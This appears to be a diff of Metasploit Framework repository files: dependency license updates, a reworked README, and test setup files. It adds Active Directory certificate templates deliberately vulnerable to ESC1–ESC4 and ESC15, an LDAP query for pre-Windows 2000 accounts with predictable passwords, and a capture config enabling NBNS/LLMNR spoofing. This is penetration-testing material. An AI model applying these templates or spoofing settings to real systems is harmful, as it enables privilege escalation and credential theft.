 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 7.0.8, MIT
-actionview, 7.0.8, MIT
-activemodel, 7.0.8, MIT
-activerecord, 7.0.8, MIT
-activesupport, 7.0.8, MIT
-addressable, 2.8.5, "Apache 2.0"
+Ascii85, 1.1.1, MIT
+aarch64, 2.1.0, "Apache 2.0"
+abbrev, 0.1.2, "ruby, Simplified BSD"
+actionpack, 7.0.8.6, MIT
+actionview, 7.0.8.6, MIT
+activemodel, 7.0.8.6, MIT
+activerecord, 7.0.8.6, MIT
+activesupport, 7.0.8.6, MIT
+addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.23.0, "Apache 2.0"
-allure-ruby-commons, 2.23.0, "Apache 2.0"
-arel-helpers, 2.14.0, MIT
+allure-rspec, 2.24.5, "Apache 2.0"
+allure-ruby-commons, 2.24.5, "Apache 2.0"
+arel-helpers, 2.15.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.834.0, "Apache 2.0"
-aws-sdk-core, 3.185.1, "Apache 2.0"
-aws-sdk-ec2, 1.411.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
-aws-sdk-iam, 1.87.0, "Apache 2.0"
-aws-sdk-kms, 1.72.0, "Apache 2.0"
-aws-sdk-s3, 1.136.0, "Apache 2.0"
-aws-sdk-ssm, 1.158.0, "Apache 2.0"
-aws-sigv4, 1.6.0, "Apache 2.0"
-base64, 0.1.1, "ruby, Simplified BSD"
-bcrypt, 3.1.19, MIT
-bcrypt_pbkdf, 1.1.0, MIT
+aws-eventstream, 1.3.0, "Apache 2.0"
+aws-partitions, 1.999.0, "Apache 2.0"
+aws-sdk-core, 3.211.0, "Apache 2.0"
+aws-sdk-ec2, 1.486.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
+aws-sdk-iam, 1.112.0, "Apache 2.0"
+aws-sdk-kms, 1.95.0, "Apache 2.0"
+aws-sdk-s3, 1.169.0, "Apache 2.0"
+aws-sdk-ssm, 1.183.0, "Apache 2.0"
+aws-sigv4, 1.10.1, "Apache 2.0"
+base64, 0.2.0, "ruby, Simplified BSD"
+bcrypt, 3.1.20, MIT
+bcrypt_pbkdf, 1.1.1, MIT
+benchmark, 0.4.0, "ruby, Simplified BSD"
+bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.16.0, MIT
-bson, 4.15.0, "Apache 2.0"
-builder, 3.2.4, MIT
-bundler, 2.1.4, MIT
+bootsnap, 1.18.4, MIT
+bson, 5.0.1, "Apache 2.0"
+builder, 3.3.0, MIT
+bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.2, MIT
-cookiejar, 0.3.3, unknown
+concurrent-ruby, 1.3.4, MIT
+cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
+csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.3, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.70.0, "Apache 2.0"
-docile, 1.4.0, MIT
-domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
+dnsruby, 1.72.2, "Apache 2.0"
+docile, 1.4.1, MIT
+domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
+elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
-em-socksify, 0.3.2, MIT
-erubi, 1.12.0, MIT
+em-socksify, 0.3.3, MIT
+erubi, 1.13.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.2.1, MIT
-factory_bot_rails, 6.2.0, MIT
-faker, 3.2.1, MIT
+factory_bot, 6.5.0, MIT
+factory_bot_rails, 6.4.4, MIT
+faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.2.0, MIT
+faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.5, MIT
+http-cookie, 1.0.7, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.1, MIT
-io-console, 0.6.0, "ruby, Simplified BSD"
+i18n, 1.14.6, MIT
+io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.3, ruby
+json, 2.7.5, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
-logging, 2.3.1, MIT
-loofah, 2.21.3, MIT
+logger, 1.6.1, "ruby, Simplified BSD"
+logging, 2.4.0, MIT
+loofah, 2.23.1, MIT
 macaddr, 1.7.2, ruby
-memory_profiler, 1.0.1, MIT
+memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.6, "New BSD"
-metasploit-framework, 6.3.56, "New BSD"
+metasploit-concern, 5.0.3, "New BSD"
+metasploit-credential, 6.0.11, "New BSD"
+metasploit-framework, 6.4.52, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.165, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
-method_source, 1.0.0, MIT
-mime-types, 3.5.1, MIT
-mime-types-data, 3.2023.1003, MIT
-mini_portile2, 2.8.4, MIT
-minitest, 5.20.0, MIT
+metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.6, "New BSD"
+metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
+method_source, 1.1.0, MIT
+mime-types, 3.6.0, MIT
+mime-types-data, 3.2024.1001, MIT
+mini_portile2, 2.8.8, MIT
+minitest, 5.25.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 3.0.0, MIT
+mustermann, 3.0.3, MIT
+mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.0, "ruby, Simplified BSD"
-net-ldap, 0.18.0, MIT
-net-protocol, 0.2.1, "ruby, Simplified BSD"
-net-smtp, 0.4.0, "ruby, Simplified BSD"
-net-ssh, 7.2.0, MIT
+net-imap, 0.5.0, "ruby, Simplified BSD"
+net-ldap, 0.19.0, MIT
+net-protocol, 0.2.2, "ruby, Simplified BSD"
+net-sftp, 4.0.0, MIT
+net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.9, MIT
-nokogiri, 1.14.5, MIT
-nori, 2.6.0, MIT
+nio4r, 2.7.4, "MIT, Simplified BSD"
+nokogiri, 1.18.2, MIT
+nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.23.0, MIT
-parser, 3.2.2.4, MIT
+parallel, 1.26.3, MIT
+parser, 3.3.5.0, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.11.0, MIT
-pg, 1.5.4, "Simplified BSD"
+pcaprub, 0.13.3, LGPL-2.1
+pdf-reader, 2.12.0, MIT
+pg, 1.5.9, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.3, MIT
-puma, 6.4.0, "New BSD"
-racc, 1.7.1, "ruby, Simplified BSD"
-rack, 2.2.8, MIT
-rack-protection, 3.1.0, MIT
+public_suffix, 6.0.1, MIT
+puma, 6.4.3, "New BSD"
+racc, 1.8.1, "ruby, Simplified BSD"
+rack, 2.2.10, MIT
+rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8, MIT
+railties, 7.0.8.6, MIT
 rainbow, 3.1.1, MIT
-rake, 13.0.6, MIT
-rasn1, 0.12.1, MIT
+rake, 13.2.1, MIT
+rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.2, unknown
+recog, 3.1.11, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.8.1, MIT
-reline, 0.4.1, ruby
+regexp_parser, 2.9.2, MIT
+reline, 0.5.10, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.15, "New BSD"
+rex-arch, 0.1.16, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.31, "New BSD"
+rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.39, "New BSD"
+rex-exploitation, 0.1.40, "New BSD"
 rex-java, 0.1.7, "New BSD"
 rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.11, "New BSD"
+rex-powershell, 0.1.100, "New BSD"
+rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.55, "New BSD"
+rex-socket, 0.1.58, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.53, "New BSD"
+rex-text, 0.2.59, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.6, "Simplified BSD"
+rexml, 3.3.9, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.12.0, MIT
-rspec-core, 3.12.2, MIT
-rspec-expectations, 3.12.3, MIT
-rspec-mocks, 3.12.6, MIT
-rspec-rails, 6.0.3, MIT
+rspec, 3.13.0, MIT
+rspec-core, 3.13.2, MIT
+rspec-expectations, 3.13.3, MIT
+rspec-mocks, 3.13.2, MIT
+rspec-rails, 7.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.12.1, MIT
-rubocop, 1.56.4, MIT
-rubocop-ast, 1.29.0, MIT
-ruby-macho, 4.0.0, MIT
+rspec-support, 3.13.1, MIT
+rubocop, 1.67.0, MIT
+rubocop-ast, 1.33.0, MIT
+ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.2, "New BSD"
-rubyntlm, 0.6.3, MIT
+ruby_smb, 3.3.13, "New BSD"
+rubyntlm, 0.6.5, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
-sinatra, 3.1.0, MIT
-sqlite3, 1.6.6, "New BSD"
+simplecov-html, 0.13.1, MIT
+simpleidn, 0.2.3, MIT
+sinatra, 3.2.0, MIT
+sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.2.3, MIT
+test-prof, 1.4.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.2.2, MIT
-tilt, 2.3.0, MIT
-timecop, 0.9.8, MIT
-timeout, 0.4.0, "ruby, Simplified BSD"
-ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
+thor, 1.3.2, MIT
+tilt, 2.4.0, MIT
+timecop, 0.9.10, MIT
+timeout, 0.4.1, "ruby, Simplified BSD"
+ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2023.3, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.5.0, MIT
+tzinfo-data, 1.2024.2, MIT
+unicode-display_width, 2.6.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.1, "ruby, Simplified BSD"
+webrick, 1.8.2, "ruby, Simplified BSD"
 websocket-driver, 0.7.6, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
-winrm, 2.3.6, "Apache 2.0"
+winrm, 2.3.9, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.34, MIT
-zeitwerk, 2.6.12, MIT
+yard, 0.9.37, MIT
+zeitwerk, 2.6.18, MIT
@@ -1,54 +1,45 @@
-Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
-==
-The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+# Metasploit Framework

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+## Latest Version
+Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+## Documentation
+Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+## Development Environment
+To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+## Bug and Feature Requests
+Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
+## API Documentation
+For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+## Support and Communication
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

-Installing
--
+## Installing Metasploit

-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+### Recommended Installation

-Using Metasploit
--
-Metasploit can do all sorts of things. The first thing you'll want to do
-is start `msfconsole`, but after that, you'll probably be best served by
-reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or take a look at the
-[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-page on the documentation website.
+We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-Contributing
--
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
-dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
-[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.

+## Using Metasploit

-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+To get started with Metasploit:

+1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
+2. **Explore Resources:** 
+   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.

+## Contributing
+
+To contribute to Metasploit:
+
+1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
+2. **Clone the Repository:** Obtain the source code from the official repository.
+3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,31 @@
+---
+# Creates a template that will be vulnerable to ESC15 (subject name supplied in
+# the request and schema version is 1). Fields are based on the SubCA template.
+# For field descriptions, see:
+# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (alter the EKUs via ESC15)
+- 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
@@ -1,5 +1,5 @@
 ---
-# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
+# Creates a template that will be vulnerable to ESC1 (subject name supplied in
 # the request). Fields are based on the SubCA template. For field descriptions,
 # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
 showInAdvancedViewOnly: 'TRUE'
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC2 (any purpose EKU).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Any Purpose OID
+- 2.5.29.37.0
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC3 (certificate request agent EKU).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Certificate Request Agent OID
+- 1.3.6.1.4.1.311.20.2.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -224,6 +224,7 @@ queries:
      - adminCount
      - managedBy
      - groupAttributes
+      - objectSID
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
  - action: ENUM_GROUP_POLICY_OBJECTS
@@ -372,3 +373,17 @@ queries:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
+    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
+    filter: '(&(userAccountControl=4128))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - logonCount
+      - userAccountControl
+    references:
+      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
+      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
@@ -1,3 +1,4 @@
+# configuration file for the capture plugin
 spoof_regex: .*
 ntlm_challenge: "1122334455667788"
 ntlm_domain: anonymous
@@ -6,6 +7,7 @@ ssl_cert: null
 logfile: null
 hashdir: null
 services:
+  # authentication services
  - type: DRDA
    enabled: yes
  - type: FTP
@@ -16,6 +18,8 @@ services:
    enabled: yes
  - type: IMAP
    enabled: yes
+  - type: LDAP
+    enabled: yes
  - type: MSSQL
    enabled: yes
  - type: MySQL
@@ -44,6 +48,7 @@ services:
    enabled: yes
  - type: SMTPS
    enabled: yes
+  # spoofing / poisoning services
  - type: NBNS
    enabled: yes
  - type: LLMNR
@@ -0,0 +1,35 @@
+## Setup
+
+This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to
+build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec`
+create process API.
+
+This directory contains:
+- C executable `show_args.c`
+  This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output
+  those args back to the user.
+
+- Makefile to build the binaries `makefile.mk`
+  This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
+  This will output the following binaries:
+
+  - Precompiled binary for Windows
+    - `show_args.exe`
+
+  - Precompiled binary for Linux and Mettle
+    - `show_args`
+
+### Note
+
+You will need to compile the OSX payload separately on an OSX machine, Docker is not supported. The test assume the file
+will be named as `show_args_macos`.
+
+
+## Compile binaries locally
+
+We make use of gcc for this: https://hub.docker.com/_/gcc
+
+- Run:
+```shell
+docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
+```
@@ -0,0 +1,5 @@
+all: show_args_linux show_args_windows
+show_args_linux: show_args.c
+	cc show_args.c -o show_args_linux
+show_args_windows: show_args.c
+	x86_64-w64-mingw32-gcc show_args.c -o show_args.exe
@@ -0,0 +1,7 @@
+int printf(const char *format, ...);
+
+int main(int argc, char *argv[]) {
+    for (int i = 0; i < argc; i++) {
+        printf("%s\n", argv[i]);
+    }
+}
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,244 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<schema name="default-config" version="1.6">
+
+    <field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
+    <field name="_version_" type="plong" indexed="false" stored="false"/>
+    <field name="_root_" type="string" indexed="true" stored="false" docValues="false" />
+    <field name="_nest_path_" type="_nest_path_" /><fieldType name="_nest_path_" class="solr.NestPathField" />
+    <field name="_text_" type="text_general" indexed="true" stored="false" multiValued="true"/>
+    <dynamicField name="*_i"  type="pint"    indexed="true"  stored="true"/>
+    <dynamicField name="*_is" type="pints"    indexed="true"  stored="true"/>
+    <dynamicField name="*_s"  type="string"  indexed="true"  stored="true" />
+    <dynamicField name="*_ss" type="strings"  indexed="true"  stored="true"/>
+    <dynamicField name="*_l"  type="plong"   indexed="true"  stored="true"/>
+    <dynamicField name="*_ls" type="plongs"   indexed="true"  stored="true"/>
+    <dynamicField name="*_t" type="text_general" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt" type="text_general" indexed="true" stored="true"/>
+    <dynamicField name="*_b"  type="boolean" indexed="true" stored="true"/>
+    <dynamicField name="*_bs" type="booleans" indexed="true" stored="true"/>
+    <dynamicField name="*_f"  type="pfloat"  indexed="true"  stored="true"/>
+    <dynamicField name="*_fs" type="pfloats"  indexed="true"  stored="true"/>
+    <dynamicField name="*_d"  type="pdouble" indexed="true"  stored="true"/>
+    <dynamicField name="*_ds" type="pdoubles" indexed="true"  stored="true"/>
+    <dynamicField name="random_*" type="random"/>
+    <dynamicField name="ignored_*" type="ignored"/>
+    <dynamicField name="*_str" type="strings" stored="false" docValues="true" indexed="false" useDocValuesAsStored="false"/>
+    <dynamicField name="*_dt"  type="pdate"    indexed="true"  stored="true"/>
+    <dynamicField name="*_dts" type="pdate"    indexed="true"  stored="true" multiValued="true"/>
+    <dynamicField name="*_p"  type="location" indexed="true" stored="true"/>
